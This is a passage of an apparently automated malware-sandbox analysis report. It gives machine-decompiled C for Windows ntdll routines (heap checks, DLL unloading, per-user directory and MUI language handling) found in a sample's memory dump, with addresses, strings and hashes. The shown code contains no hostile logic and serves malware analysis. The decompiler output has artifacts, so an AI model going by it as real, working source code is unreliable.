										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E3418036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E34235FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E34235FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x3426432c; // 0x0
						_v24 = 0x3426432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}

0x34180689
0x3418068d
0x34180690
0x34180699
0x341806a3
0x34180929
0x00000000
0x34180929
0x341806b0
0x341d4e97
0x341d4e99
0x341d4e9f
0x341d4ea5
0x341d4ea9
0x341d4eca
0x341d4ecf
0x341d4eab
0x341d4ec0
0x341d4ec5
0x341d4ed7
0x341d4edc
0x341d4ee4
0x341d4eeb
0x341d4ef6
0x341d4ef6
0x341d4eeb
0x341d4e99
0x341806b6
0x341806b9
0x341806b9
0x341806be
0x34180921
0x341806c4
0x341806c4
0x341806c4
0x341806ca
0x341806d3
0x341806d9
0x341806dc
0x341d4f0a
0x341d4f10
0x341d4f13
0x00000000
0x341806e2
0x341806e2
0x341806f2
0x34180930
0x34180936
0x34180938
0x3418093e
0x3418093e
0x34180938
0x341806ff
0x341d4f1b
0x341d4f1d
0x341d4f22
0x341d4f29
0x341d4f2a
0x341d4f2c
0x341d4f2d
0x341d4f2f
0x341d4f34
0x341d4f36
0x341d4f39
0x341d4f44
0x341d4f4d
0x341d4f4f
0x341d4f54
0x341d4f5b
0x341d4f5b
0x00000000
0x341d4f5b
0x341d4f3b
0x341d4f3d
0x00000000
0x00000000
0x341d4f3f
0x341d4f42
0x00000000
0x00000000
0x00000000
0x34180705
0x34180705
0x3418070c
0x3418070e
0x34180724
0x34180727
0x3418072d
0x34180730
0x34180751
0x34180751
0x34180757
0x3418075c
0x3418075d
0x3418075f
0x34180760
0x34180762
0x34180767
0x3418076a
0x3418076a
0x34180770
0x34180772
0x341d4f9f
0x00000000
0x341d4f9f
0x3418077e
0x34180783
0x341d4faa
0x341d4fad
0x00000000
0x00000000
0x341d4fbc
0x3418078e
0x34180791
0x341d4fcc
0x341d4fd3
0x341d4fe2
0x341d4fe2
0x341d4fd3
0x3418079b
0x341807a0
0x341807a4
0x341807b0
0x341807b7
0x341d4fec
0x341d4ff1
0x341d4ff1
0x341807b7
0x341807bd
0x341807c1
0x341807c5
0x341807c8
0x341807cb
0x341807d0
0x341807d3
0x341807d3
0x341807d6
0x341d5008
0x341807e4
0x341807e4
0x341807e6
0x341807e6
0x341807e9
0x341807ee
0x3418081b
0x3418081b
0x3418081e
0x34180827
0x3418082d
0x34180833
0x34180839
0x3418083f
0x34180848
0x341808fd
0x34180903
0x34180903
0x3418084e
0x34180851
0x34180855
0x34180945
0x3418094d
0x34180950
0x34180953
0x34180964
0x00000000
0x34180964
0x34180955
0x00000000
0x3418085b
0x3418085b
0x3418086e
0x34180876
0x34180879
0x34180879
0x3418087c
0x34180880
0x34180885
0x341808dd
0x341808de
0x341808e1
0x341808e6
0x341808f3
0x341808f8
0x341808f8
0x34180887
0x34180887
0x34180887
0x34180889
0x34180892
0x34180897
0x341d505d
0x341d5060
0x00000000
0x00000000
0x341d506f
0x341808a2
0x341808a5
0x341d5079
0x341d507f
0x341d5086
0x00000000
0x00000000
0x341d5091
0x341d5093
0x341d50a5
0x341d5095
0x341d509e
0x341d509e
0x341d50af
0x341d50be
0x341808ae
0x341808b4
0x341808b9
0x341d50c8
0x341d50cb
0x00000000
0x00000000
0x341d50da
0x341808c4
0x341808c7
0x341d50e9
0x341d50eb
0x341d50fd
0x341d50ed
0x341d50f6
0x341d50f6
0x341d5113
0x341d5113
0x00000000
0x341808cd
0x341808bf
0x341808bf
0x00000000
0x341808bf
0x341808ab
0x341808ab
0x00000000
0x341808ab
0x3418089d
0x3418089d
0x00000000
0x3418089d
0x341807f0
0x341807f0
0x341807f8
0x341d5014
0x341d5017
0x341d501a
0x341d5036
0x341d503d
0x00000000
0x00000000
0x00000000
0x00000000
0x341d501c
0x341d501c
0x341d501c
0x341d501e
0x341d5020
0x341d5023
0x341d5026
0x00000000
0x00000000
0x341d5028
0x341d502b
0x341d502e
0x00000000
0x00000000
0x00000000
0x341d5030
0x341d5035
0x341d5035
0x00000000
0x341d5035
0x341807fe
0x341807fe
0x34180801
0x34180803
0x34180808
0x341d5053
0x34180816
0x34180816
0x34180818
0x34180818
0x00000000
0x34180808
0x341807ee
0x34180789
0x34180789
0x00000000
0x34180789
0x34180732
0x34180736
0x341d4f63
0x341d4f66
0x341d4f66
0x341d4f6b
0x341d4f6d
0x00000000
0x00000000
0x341d4f76
0x341d4f79
0x341d4f7b
0x341d4f8d
0x341d4f92
0x341d4f92
0x341d4f95
0x00000000
0x341d4f95
0x3418073c
0x34180742
0x3418074b
0x00000000
0x00000000
0x00000000
0x3418074b
0x341806ff

Strings

(UCRBlock->Size >= *Size), xrefs: 341D4ED7
HEAP[%wZ]: , xrefs: 341D4EBB
HEAP: , xrefs: 341D4ECA

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 1c5a0f22bdfcec1ef1da2aa43ff7f764c286bf31efcac3e615c3af0b307caea2
Instruction ID: 77da21e47f04d391ddbf545fb78b419a6284f54261c6eba0362ef2a40a715333
Opcode Fuzzy Hash: 1c5a0f22bdfcec1ef1da2aa43ff7f764c286bf31efcac3e615c3af0b307caea2
Instruction Fuzzy Hash: ADF17AB4A00B09DFEB15CF68C8D4B6ABBB5FF45344F1181A9E415AB291DB34E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34199723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E34199723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E3419A4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x342665f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x34269214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E3417FED0(0x342632d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x77aa36a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E34190C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x342691e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							L341798DE(_t87, "true");
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E341F85AA(_t87);
							}
						}
						__eflags =  *0x342637c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E341EE692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E3419A390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x342632d8);
					_t50 = E3417E740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L34182330(_t50, 0x34266668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								L3418D963(_t86, _t86, 0, _t104, _t110, __eflags);
								E341824D0(0x34266668);
								__eflags = _v12;
								if(_v12 != 0) {
									E34199723(_t86, 0);
								}
								_t50 = L34183BC0( *0x34265d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						L34199938(L34182330(_t50, 0x34266668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L34199B40(_t85, _t107, _t110, 0x342667ac);
							_t29 = _t107 + 0x68; // -68
							L34199B40(_t85, _t107, _t110, 0x342667a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E341824D0(0x34266668);
						if( *0x34265d70 != 0) {
							E341A680F(_t107);
						}
						_t50 = E3418D3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}

0x34199723
0x3419972b
0x34199736
0x34199738
0x3419973c
0x3419973e
0x34199742
0x34199747
0x341997bc
0x341997bc
0x341997bc
0x341997bc
0x341997c0
0x341997c5
0x341997c5
0x341997cb
0x34199900
0x34199908
0x34199913
0x34199914
0x34199916
0x34199918
0x34199918
0x341997d6
0x341997db
0x341997dd
0x341997dd
0x341997e1
0x341997e3
0x00000000
0x00000000
0x341997e5
0x341997e5
0x341997e8
0x341997ec
0x341997ee
0x341997f1
0x341997f4
0x341997f9
0x341997fb
0x34199922
0x34199928
0x34199928
0x34199803
0x34199805
0x3419980a
0x3419980e
0x34199815
0x341ddade
0x341ddae0
0x341ddae0
0x34199815
0x3419981b
0x34199822
0x341ddaea
0x341ddb04
0x341ddb09
0x341ddb09
0x34199828
0x3419982a
0x3419982d
0x34199836
0x34199836
0x3419983a
0x3419983f
0x34199755
0x34199755
0x34199755
0x3419975a
0x00000000
0x00000000
0x3419986e
0x34199870
0x34199872
0x3419992f
0x34199931
0x34199878
0x34199878
0x34199878
0x34199878
0x34199878
0x3419987c
0x3419987e
0x00000000
0x34199884
0x34199889
0x3419988e
0x34199891
0x34199891
0x34199894
0x34199897
0x34199899
0x3419989d
0x3419989f
0x341998b1
0x341998b3
0x341998b5
0x341998b8
0x341998c0
0x341998c2
0x341998c2
0x341998c4
0x341998c4
0x341998cd
0x341998d0
0x341998da
0x341998df
0x341998e4
0x341998e8
0x341998e8
0x341998f6
0x00000000
0x341998f6
0x341998a1
0x341998a3
0x341998a3
0x341998a5
0x341998a7
0x341998a9
0x341998a9
0x341998ad
0x00000000
0x341998ad
0x3419987e
0x34199760
0x34199762
0x3419976b
0x341997b5
0x341997bb
0x00000000
0x00000000
0x00000000
0x3419976d
0x3419976d
0x3419976d
0x3419976f
0x34199777
0x34199782
0x3419978b
0x34199849
0x34199852
0x34199857
0x34199860
0x34199865
0x34199865
0x34199796
0x341997a2
0x341ddb13
0x341ddb13
0x341997aa
0x341997af
0x341997b1
0x00000000
0x3419976d
0x3419974d
0x00000000
0x00000000
0x34199753
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34199922

Strings

Unmapping DLL "%wZ", xrefs: 341DDAEE
minkernel\ntdll\ldrsnap.c, xrefs: 341DDAFF
LdrpUnloadNode, xrefs: 341DDAF5

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 85470d7ee6ae22ad24cc7aa6eab6b36864c590e57570f3af79cfb3371673b89e
Instruction ID: 718d9a654eb75875bd6e973c7fd6ca0c8536f6966deb993617c389c89aea4da0
Opcode Fuzzy Hash: 85470d7ee6ae22ad24cc7aa6eab6b36864c590e57570f3af79cfb3371673b89e
Instruction Fuzzy Hash: 1451ED71720F01DFE315DF28C8C4AA9B7E6BB84214F1406ADE452A73A1EB74A845CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 341AC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E341AC640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E34190130();
				if(_t25 != 0) {
					L34182330(_t25, 0x34265b5c);
					_t27 =  *0x34269224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E34169050( *0x3426921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E341824D0(0x34265b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x3426b370 ^ _t87;
							_t76 = _t65;
							 *0x342691e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x3426660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									L341FCB20(0x34265b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x34266608 & 0x0000ffff) + 2 + _t67;
									_t42 = E34185D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E341910D0(_t67,  &_v572, 0x34266608);
										E341910D0(_t67,  &_v580,  &_v572);
										E3417FE40(_t67,  &_v588, ";");
										L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x3426660c);
										 *0x34266608 = _v608;
										_t54 = _v604;
										 *0x3426660c = _t54;
										 *0x34266604 = _t54;
										E341FD4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x342637c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E341EE692();
											_t56 =  *0x342637c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return L341B4B50(_t39, 0x34265b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x34269224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E34169050( *0x3426921c, "true");
								}
							}
							_t25 = E341824D0(0x34265b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}

0x341ac640
0x341ac642
0x341ac644
0x341ac645
0x341ac647
0x341ac64e
0x341ac65a
0x341ac65f
0x341ac664
0x341ac666
0x341ac668
0x341ac6a4
0x341ac6a6
0x00000000
0x341ac6a8
0x341ac6a8
0x00000000
0x341ac6a8
0x341ac66a
0x341ac66a
0x341ac66c
0x341ac675
0x341ac675
0x341ac67a
0x341ac67d
0x341ac6ab
0x341ac6ac
0x341ac6b3
0x341ac6b4
0x341ac6be
0x341ac6cb
0x341ac6dc
0x341ac6df
0x341ac6e9
0x341ac6e9
0x341ac6eb
0x341e8090
0x341e809b
0x341e80a4
0x341e80a9
0x341e80ae
0x341e817f
0x341e8183
0x341e8188
0x341e8189
0x00000000
0x341e80b4
0x341e80c4
0x341e80cc
0x341e80d1
0x341e80d5
0x341e80d7
0x341e8114
0x341e8116
0x341e811b
0x341e812a
0x341e8139
0x341e8148
0x341e815e
0x341e8167
0x341e816c
0x341e8170
0x341e8175
0x341e817a
0x00000000
0x341e80d9
0x341e80d9
0x341e80de
0x341e80e0
0x341e80e2
0x341e80e7
0x341e80e9
0x341e80ee
0x341e80f3
0x341e80f8
0x341e80fd
0x341e8102
0x341e8102
0x341e8105
0x341e8107
0x341e8109
0x341e8109
0x341e810a
0x341e810a
0x341e80d7
0x341ac6f1
0x341ac6f1
0x341ac6f1
0x341ac6f1
0x341ac6f1
0x341ac6fa
0x341ac6fb
0x341ac705
0x341ac67f
0x341ac67f
0x341ac67f
0x341ac680
0x341ac680
0x341ac685
0x341ac687
0x341ac689
0x341ac68b
0x341ac68d
0x341ac697
0x341ac697
0x341ac68d
0x341ac69d
0x00000000
0x341ac69d
0x341ac67d
0x341ac650
0x341ac650
0x341ac653
0x341ac653

APIs

RtlDebugPrintTimes.NTDLL ref: 341AC6DF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 341E80F3
Failed to reallocate the system dirs string !, xrefs: 341E80E2
LdrpInitializePerUserWindowsDirectory, xrefs: 341E80E9

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 821a67f19026ac77e3b34c0e5874bbf9c2c81b3842dc2fe8c0f9ea282d506c48
Instruction ID: 4d35e05c791d7c962236b3f0a288f7169b2fcfa0e9b1546118a2b7d1a59e7c0e
Opcode Fuzzy Hash: 821a67f19026ac77e3b34c0e5874bbf9c2c81b3842dc2fe8c0f9ea282d506c48
Instruction Fuzzy Hash: 7541C4B9500B00EFE711DB28DD88B9B7BE9EB44750F04456AF958A3260EBB8D8018F95

Uniqueness

Uniqueness Score: -1.00%

Function 3419510F Relevance: 6.7, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E3419510F(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(L34198BD1(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(L34198BD1(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(L34198BD1(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(L34198BD1(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(L34198BD1(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t71 = _v12 + 4; // 0x6
						_t255 = _t71;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = E34185D90(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							L341B88C0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = L341BA8B0(_t276, ";");
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E341B5050(0,  &_v68, _t170);
									if(E341956E0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E341B5050(_t257,  &_v68, _t243);
								if(E341956E0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = L341BA8B0(_t278, ";");
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t48 = _v12 + 4; // 0x6
					_t260 = _t48;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = E34185D90(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						L341B88C0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = L341BA8B0(_v16, ";");
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E341B5050(_t262,  &_v68, _t244);
								if(E341956E0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = L341BA8B0(_t282, ";");
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E341B5050(_t262,  &_v68, _t201);
							if(E341956E0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t26 = _v12 + 4; // 0x6
				_t264 = _t26;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = E34185D90(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					L341B88C0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = L341BA8B0(_t280, ";");
					_pop(_t267);
